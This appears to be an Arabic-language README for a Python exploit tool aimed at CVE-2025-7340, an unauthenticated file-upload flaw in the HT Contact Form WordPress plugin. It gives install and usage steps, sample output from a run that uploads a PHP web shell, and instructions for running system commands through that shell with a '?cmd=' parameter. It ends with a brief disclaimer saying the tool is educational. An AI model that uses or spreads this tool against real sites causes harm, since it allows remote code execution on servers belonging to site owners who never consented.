
HT Contact Form Widget لمنشئ صفحات Elementor وكتل Gutenberg ومنشئ النماذج. <= 2.2.1 - رفع ملفات تعسفي بدون مصادقة
CVE: CVE-2025-7340
CVSS: 9.8 (حرِج)
إضافة HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. في ووردبريس عرضة لرفع ملفات تعسفي بسبب غياب التحقق من نوع الملف في دالة temp_file_upload في جميع الإصدارات حتى الإصدار 2.2.1 وما يشملها.
يسمح هذا للمهاجمين غير المصادَق عليهم برفع ملفات تعسفية إلى الخادم، مما قد يؤدي إلى تنفيذ أكواد عن بُعد (RCE).
يحتوي هذا المستودع على سكربت استغلال بلغة Python يعمل على أتمتة اكتشاف النموذج القابل للاستغلال ورفع ويب شيل إلى الموقع المتأثر.
يكتشف السكربت بذكاء المعاملات المطلوبة (nonce, form_id, نقطة نهاية AJAX) ويرفع شيل PHP إلى المسار القابل للاستغلال.
✅ مثال على رابط النموذج القابل للاستغلال:
http://target.com/contact/
✅ يجب أن يكون النموذج القابل للاستغلال موجودًا في الصفحة التي تمررها إلى خيار -u.
قبل تشغيل السكربت، ثبّت وحدات Python المطلوبة:
pip install -r requirements.txt
محتوى requirements.txt:
requests
colorama
usage: CVE-2025-7340.py [-h]
Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com
| الخيار | الوصف |
|---|---|
-h, --help | عرض رسالة المساعدة هذه والخروج |
-u, --url URL | رابط الهدف، مثل: http(s)://target.com/contact |
بمجرد اكتمال الاستغلال بنجاح، يمكنك الوصول إلى الشيل الذي رفعته عبر المسار المعطى.
أضف ?cmd=<your_command> إلى نهاية الرابط لتنفيذ أوامر النظام.
✅ مثال:
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...
[+] Exploit Successfully!
Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
هذه الأداة مقدمة لأغراض تعليمية وبحثية فقط.
المؤلف غير مسؤول عن أي ضرر أو إساءة استخدام لهذا الكود.
احصل دائمًا على إذن صريح قبل اختبار أي نظام.
Khaled Alenazi (Nxploited)
GitHub: Nxploited